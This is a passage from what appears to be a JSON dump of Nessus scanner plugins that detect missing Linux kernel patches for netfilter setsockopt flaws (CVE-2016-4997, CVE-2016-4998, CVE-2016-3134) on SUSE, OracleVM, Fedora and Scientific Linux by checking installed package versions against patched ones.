SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(93171);\n script_version(\"2.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2016-4997\", \"CVE-2016-4998\");\n\n script_name(english:\"SUSE SLED12 / SLES12 Security Update : kernel (SUSE-SU-2016:1709-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The SUSE Linux Enterprise 12 kernel was updated to receive critical\nsecurity and bugfixes.\n\nSecurity issue fixed :\n\n - CVE-2016-4997: A buffer overflow in 32bit\n compat_setsockopt iptables handling could lead to a\n local privilege escalation. (bsc#986362)\n\nThe update package also includes non-security fixes. See advisory for\ndetails.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=971770\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=972124\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=981143\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=983394\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=986362\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-4998/\"\n );\n # https://www.suse.com/support/update/announcement/2016/suse-su-20161709-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?4765b682\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Workstation Extension 12-SP1 :\n\nzypper in -t patch SUSE-SLE-WE-12-SP1-2016-1012=1\n\nSUSE Linux Enterprise Software Development Kit 12-SP1 :\n\nzypper in -t patch SUSE-SLE-SDK-12-SP1-2016-1012=1\n\nSUSE Linux Enterprise Server 12-SP1 :\n\nzypper in -t patch SUSE-SLE-SERVER-12-SP1-2016-1012=1\n\nSUSE Linux Enterprise Module for Public Cloud 12 :\n\nzypper in -t patch SUSE-SLE-Module-Public-Cloud-12-2016-1012=1\n\nSUSE Linux Enterprise Live Patching 12 :\n\nzypper in -t patch SUSE-SLE-Live-Patching-12-2016-1012=1\n\nSUSE Linux Enterprise Desktop 12-SP1 :\n\nzypper in -t patch SUSE-SLE-DESKTOP-12-SP1-2016-1012=1\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Linux Kernel 4.6.3 Netfilter Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-base-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-extra\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-extra-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-man\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-syms\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-xen-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-xen-base-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-xen-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-xen-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-xen-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/07/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/06/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/08/29\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLED12|SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLED12 / SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(1)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP1\", os_ver + \" SP\" + sp);\nif (os_ver == \"SLED12\" && (! preg(pattern:\"^(1)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLED12 SP1\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"1\", cpu:\"x86_64\", reference:\"kernel-xen-3.12.59-60.45.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", cpu:\"x86_64\", reference:\"kernel-xen-base-3.12.59-60.45.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", cpu:\"x86_64\", reference:\"kernel-xen-base-debuginfo-3.12.59-60.45.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", cpu:\"x86_64\", reference:\"kernel-xen-debuginfo-3.12.59-60.45.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", cpu:\"x86_64\", reference:\"kernel-xen-debugsource-3.12.59-60.45.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", cpu:\"x86_64\", reference:\"kernel-xen-devel-3.12.59-60.45.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", cpu:\"s390x\", reference:\"kernel-default-man-3.12.59-60.45.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"kernel-default-3.12.59-60.45.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"kernel-default-base-3.12.59-60.45.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"kernel-default-base-debuginfo-3.12.59-60.45.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"kernel-default-debuginfo-3.12.59-60.45.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"kernel-default-debugsource-3.12.59-60.45.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"kernel-default-devel-3.12.59-60.45.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"kernel-syms-3.12.59-60.45.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"kernel-default-3.12.59-60.45.2\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"kernel-default-debuginfo-3.12.59-60.45.2\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"kernel-default-debugsource-3.12.59-60.45.2\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"kernel-default-devel-3.12.59-60.45.2\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"kernel-default-extra-3.12.59-60.45.2\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"kernel-default-extra-debuginfo-3.12.59-60.45.2\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"kernel-syms-3.12.59-60.45.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"kernel-xen-3.12.59-60.45.2\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"kernel-xen-debuginfo-3.12.59-60.45.2\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"kernel-xen-debugsource-3.12.59-60.45.2\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"kernel-xen-devel-3.12.59-60.45.2\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-06T13:23:59", "description": "The remote OracleVM system is missing necessary patches to address\ncritical security updates :\n\n - netfilter: x_tables: make sure e->next_offset covers\n remaining blob size (Florian Westphal) [Orabug:\n 24682076] (CVE-2016-4997) (CVE-2016-4998)\n\n - netfilter: x_tables: validate e->target_offset early\n (Florian Westphal) [Orabug: 24682076] (CVE-2016-4997)\n (CVE-2016-4998)", "edition": 30, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-09-26T00:00:00", "title": "OracleVM 3.4 : Unbreakable / etc (OVMSA-2016-0134)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-4997", "CVE-2016-4998"], "modified": "2016-09-26T00:00:00", "cpe": ["cpe:/o:oracle:vm_server:3.4", "p-cpe:/a:oracle:vm:kernel-uek", "p-cpe:/a:oracle:vm:kernel-uek-firmware"], "id": "ORACLEVM_OVMSA-2016-0134.NASL", "href": "https://www.tenable.com/plugins/nessus/93709", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The package checks in this plugin were extracted from OracleVM\n# Security Advisory OVMSA-2016-0134.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(93709);\n script_version(\"2.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2016-4997\", \"CVE-2016-4998\");\n\n script_name(english:\"OracleVM 3.4 : Unbreakable / etc (OVMSA-2016-0134)\");\n script_summary(english:\"Checks the RPM output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote OracleVM host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote OracleVM system is missing necessary patches to address\ncritical security updates :\n\n - netfilter: x_tables: make sure e->next_offset covers\n remaining blob size (Florian Westphal) [Orabug:\n 24682076] (CVE-2016-4997) (CVE-2016-4998)\n\n - netfilter: x_tables: validate e->target_offset early\n (Florian Westphal) [Orabug: 24682076] (CVE-2016-4997)\n (CVE-2016-4998)\"\n );\n # https://oss.oracle.com/pipermail/oraclevm-errata/2016-September/000550.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?be9fcee1\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected kernel-uek / kernel-uek-firmware packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Linux Kernel 4.6.3 Netfilter Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:kernel-uek\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:kernel-uek-firmware\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:vm_server:3.4\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/07/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/09/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/09/26\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"OracleVM Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleVM/release\", \"Host/OracleVM/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/OracleVM/release\");\nif (isnull(release) || \"OVS\" >!< release) audit(AUDIT_OS_NOT, \"OracleVM\");\nif (! preg(pattern:\"^OVS\" + \"3\\.4\" + \"(\\.[0-9]|$)\", string:release)) audit(AUDIT_OS_NOT, \"OracleVM 3.4\", \"OracleVM \" + release);\nif (!get_kb_item(\"Host/OracleVM/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"OracleVM\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"OVS3.4\", reference:\"kernel-uek-4.1.12-61.1.10.el6uek\")) flag++;\nif (rpm_check(release:\"OVS3.4\", reference:\"kernel-uek-firmware-4.1.12-61.1.10.el6uek\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel-uek / kernel-uek-firmware\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-12T10:14:23", "description": "The 4.5.7-202 kernel update contains a number of important security\nfixes.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "edition": 19, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-07-15T00:00:00", "title": "Fedora 23 : kernel (2016-73a733f4d9)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-5728", "CVE-2016-1583", "CVE-2016-5829", "CVE-2016-1237", "CVE-2016-4470", "CVE-2016-4998"], "modified": "2016-07-15T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:kernel", "cpe:/o:fedoraproject:fedora:23"], "id": "FEDORA_2016-73A733F4D9.NASL", "href": "https://www.tenable.com/plugins/nessus/92256", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2016-73a733f4d9.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(92256);\n script_version(\"2.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2016-1237\", \"CVE-2016-1583\", \"CVE-2016-4470\", \"CVE-2016-4998\", \"CVE-2016-5728\", \"CVE-2016-5829\");\n script_xref(name:\"FEDORA\", value:\"2016-73a733f4d9\");\n\n script_name(english:\"Fedora 23 : kernel (2016-73a733f4d9)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The 4.5.7-202 kernel update contains a number of important security\nfixes.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2016-73a733f4d9\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected kernel package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Linux Kernel 4.6.3 Netfilter Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:23\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/06/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/07/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/07/15\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\ninclude(\"ksplice.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^23([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 23\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2016-1237\", \"CVE-2016-1583\", \"CVE-2016-4470\", \"CVE-2016-4998\", \"CVE-2016-5728\", \"CVE-2016-5829\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for FEDORA-2016-73a733f4d9\");\n }\n else\n {\n __rpm_report = ksplice_reporting_text();\n }\n}\n\nflag = 0;\nif (rpm_check(release:\"FC23\", reference:\"kernel-4.5.7-202.fc23\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T13:49:22", "description": "Security Fix(es) :\n\n - A security flaw was found in the Linux kernel in the\n mark_source_chains() function in\n 'net/ipv4/netfilter/ip_tables.c'. It is possible for a\n user-supplied 'ipt_entry' structure to have a large\n 'next_offset' field. This field is not bounds checked\n prior to writing to a counter value at the supplied\n offset. (CVE-2016-3134, Important)\n\n - A flaw was discovered in processing setsockopt for 32\n bit processes on 64 bit systems. This flaw will allow\n attackers to alter arbitrary kernel memory when\n unloading a kernel module. This action is usually\n restricted to root-privileged users but can also be\n leveraged if the kernel is compiled with CONFIG_USER_NS\n and CONFIG_NET_NS and the user is granted elevated\n privileges. (CVE-2016-4997, Important)\n\n - An out-of-bounds heap memory access leading to a Denial\n of Service, heap disclosure, or further impact was found\n in setsockopt(). The function call is normally\n restricted to root, however some processes with\n cap_sys_admin may also be able to trigger this flaw in\n privileged container environments. (CVE-2016-4998,\n Moderate)\n\nBug Fix(es) :\n\n - In some cases, running the ipmitool command caused a\n kernel panic due to a race condition in the ipmi message\n handler. This update fixes the race condition, and the\n kernel panic no longer occurs in the described scenario.\n\n - Previously, running I/O-intensive operations in some\n cases caused the system to terminate unexpectedly after\n a NULL pointer dereference in the kernel. With this\n update, a set of patches has been applied to the 3w-9xxx\n and 3w-sas drivers that fix this bug. As a result, the\n system no longer crashes in the described scenario.\n\n - Previously, the Stream Control Transmission Protocol\n (SCTP) sockets did not inherit the SELinux labels\n properly. As a consequence, the sockets were labeled\n with the unlabeled_t SELinux type which caused SCTP\n connections to fail. The underlying source code has been\n modified, and SCTP connections now works as expected.\n\n - Previously, the bnx2x driver waited for transmission\n completions when recovering from a parity event, which\n substantially increased the recovery time. With this\n update, bnx2x does not wait for transmission completion\n in the described circumstances. As a result, the\n recovery of bnx2x after a parity event now takes less\n time.\n\nEnhancement(s) :\n\n - With this update, the audit subsystem enables filtering\n of processes by name besides filtering by PID. Users can\n now audit by executable name (with the '-F\n exe=<path-to-executable>' option), which allows\n expression of many new audit rules. This functionality\n can be used to create events when specific applications\n perform a syscall.\n\n - With this update, the Nonvolatile Memory Express (NVMe)\n and the multi- queue block layer (blk_mq) have been\n upgraded to the Linux 4.5 upstream version. Previously,\n a race condition between timeout and freeing request in\n blk_mq occurred, which could affect the\n blk_mq_tag_to_rq() function and consequently a kernel\n oops could occur. The provided patch fixes this race\n condition by updating the tags with the active request.\n The patch simplifies blk_mq_tag_to_rq() and ensures that\n the two requests are not active at the same time.\n\n - The Hyper-V storage driver (storvsc) has been upgraded\n from upstream. This update provides moderate performance\n improvement of I/O operations when using storvscr for\n certain workloads.", "edition": 18, "cvss3": {"score": 8.4, "vector": "AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-09-16T00:00:00", "title": "Scientific Linux Security Update : kernel on SL7.x x86_64 (20160915)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-4997", "CVE-2016-4998", "CVE-2016-3134"], "modified": "2016-09-16T00:00:00", "cpe": ["p-cpe:/a:fermilab:scientific_linux:kernel-debuginfo-common-x86_64", "p-cpe:/a:fermilab:scientific_linux:kernel-debug-debuginfo", "p-cpe:/a:fermilab:scientific_linux:kernel-abi-whitelists", "p-cpe:/a:fermilab:scientific_linux:kernel", "p-cpe:/a:fermilab:scientific_linux:kernel-debuginfo", "p-cpe:/a:fermilab:scientific_linux:python-perf-debuginfo", "p-cpe:/a:fermilab:scientific_linux:perf-debuginfo", "p-cpe:/a:fermilab:scientific_linux:kernel-debug", "p-cpe:/a:fermilab:scientific_linux:kernel-headers", "p-cpe:/a:fermilab:scientific_linux:python-perf", "p-cpe:/a:fermilab:scientific_linux:kernel-devel", "p-cpe:/a:fermilab:scientific_linux:kernel-debug-devel", "p-cpe:/a:fermilab:scientific_linux:kernel-tools-libs-devel", "x-cpe:/o:fermilab:scientific_linux", "p-cpe:/a:fermilab:scientific_linux:kernel-doc", "p-cpe:/a:fermilab:scientific_linux:perf", "p-cpe:/a:fermilab:scientific_linux:kernel-tools-debuginfo", "p-cpe:/a:fermilab:scientific_linux:kernel-tools", "p-cpe:/a:fermilab:scientific_linux:kernel-tools-libs"], "id": "SL_20160915_KERNEL_ON_SL7_X.NASL", "href": "https://www.tenable.com/plugins/nessus/93557", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(93557);\n script_version(\"2.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2016-3134\", \"CVE-2016-4997\", \"CVE-2016-4998\");\n\n script_name(english:\"Scientific Linux Security Update : kernel on SL7.x x86_64 (20160915)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Security Fix(es) :\n\n - A security flaw was found in the Linux kernel in the\n mark_source_chains() function in\n 'net/ipv4/netfilter/ip_tables.c'. It is possible for a\n user-supplied 'ipt_entry' structure to have a large\n 'next_offset' field. This field is not bounds checked\n prior to writing to a counter value at the supplied\n offset. (CVE-2016-3134, Important)\n\n - A flaw was discovered in processing setsockopt for 32\n bit processes on 64 bit systems. This flaw will allow\n attackers to alter arbitrary kernel memory when\n unloading a kernel module. This action is usually\n restricted to root-privileged users but can also be\n leveraged if the kernel is compiled with 